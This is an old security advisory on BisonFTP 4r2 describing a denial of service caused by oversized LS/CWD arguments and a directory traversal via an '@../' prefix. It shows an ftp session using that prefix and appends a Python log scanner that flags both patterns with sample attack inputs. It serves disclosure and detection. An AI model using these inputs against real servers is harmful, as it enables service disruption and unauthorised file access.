[NT] Multiple Vulnerabilities Found in BisonFTP (DoS, Directory Traversal @)
From: support@securiteam.com
Date: 02/17/03
From: support@securiteam.com To: list@securiteam.com Date: 17 Feb 2003 22:29:54 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Multiple Vulnerabilities Found in BisonFTP (DoS, Directory Traversal @)
------------------------------------------------------------------------
SUMMARY
<http://www.bisonftp.com/> BisonFTP Server is a native Windows FTP
Server. It offers the standard features of other FTP servers and adds
features such as S/KEY passwords and file filtering. Two security
vulnerabilities have been found in the product: one allows a remote
attacker to make the server stop responding to legitimate requests, and
the other allows viewing files and directories that reside outside the
bounding FTP root directory.
DETAILS
Vulnerable systems:
* BisonFTP version 4r2
Denial of service:
BisonFTP is vulnerable to a denial of service triggered by oversized FTP
commands. When it receives an LS or CWD command whose argument is 4300
bytes or more, BisonFTP goes to 100% CPU usage and stays there until the
client closes the socket.
Directory Traversal:
It is possible to trick BisonFTP into revealing confidential information
about files outside the FTP root.
ftp> ls @../
227 Entering PASV Mode (10,10,10,10,4,126)
150 Directory List Follows
-rwxrwxrwx 1 user group 739577 Feb 05 2002 BisonFTP42.exe
226 Listing complete.
ftp> mget @../Biso
local: BisonFTP42.exe remote: BisonFTP42.exe
227 Entering PASV Mode (10,10,10,10,4,128)
550 File does not exist
ftp>
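As an added defender-side example that is not part of the advisory, the following Python script flags both conditions described above in constructed FTP control-channel log lines: a listing (LIST/NLST, which is what the client's ls sends on the wire) or CWD command whose argument is 4300 bytes or longer, and any command argument carrying the "@../" traversal prefix. The log line format and the client addresses are assumptions.

```python
import re

# Threshold from the advisory: LS/CWD arguments of 4300 bytes or more pin
# BisonFTP 4r2 at 100% CPU until the client closes the socket.
DOS_ARG_LEN = 4300
# Wire commands behind the client's "ls" and "cd" (LIST, NLST, CWD).
DOS_COMMANDS = {"LIST", "NLST", "CWD"}
# Traversal marker from the advisory: an "@" immediately followed by "../".
TRAVERSAL_RE = re.compile(r"@\.\./")

# Constructed control-channel log lines in an assumed format:
# "<client ip> <FTP command> [argument]". The oversized argument is generated.
SAMPLE_LOG = [
    "10.10.10.5 USER anonymous",
    "10.10.10.5 CWD /pub",
    "10.10.10.5 LIST @../",
    "10.10.10.5 RETR @../Biso",
    "10.10.10.7 LIST " + "A" * 4300,
    "10.10.10.7 CWD /incoming",
]


def classify(line):
    """Return the finding tags for one log line (empty list if clean)."""
    parts = line.split(" ", 2)
    if len(parts) < 2:
        return []  # malformed line: nothing to judge
    command = parts[1].upper()
    arg = parts[2] if len(parts) == 3 else ""
    findings = []
    # DoS condition: a listing or CWD command with an oversized argument.
    if command in DOS_COMMANDS and len(arg.encode()) >= DOS_ARG_LEN:
        findings.append("oversized-argument")
    # Traversal condition: the "@../" prefix on any command argument.
    if TRAVERSAL_RE.search(arg):
        findings.append("at-traversal")
    return findings


def scan(lines):
    """Return (line index, client ip, tags) for every line that fired."""
    hits = []
    for index, line in enumerate(lines):
        tags = classify(line)
        if tags:
            hits.append((index, line.split(" ", 1)[0], tags))
    return hits


if __name__ == "__main__":
    for index, client, tags in scan(SAMPLE_LOG):
        print(f"line {index}: {client} -> {', '.join(tags)}")
```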
ADDITIONAL INFORMATION
The information has been provided by <mailto:ja@immune.dk> Immune
Advisory.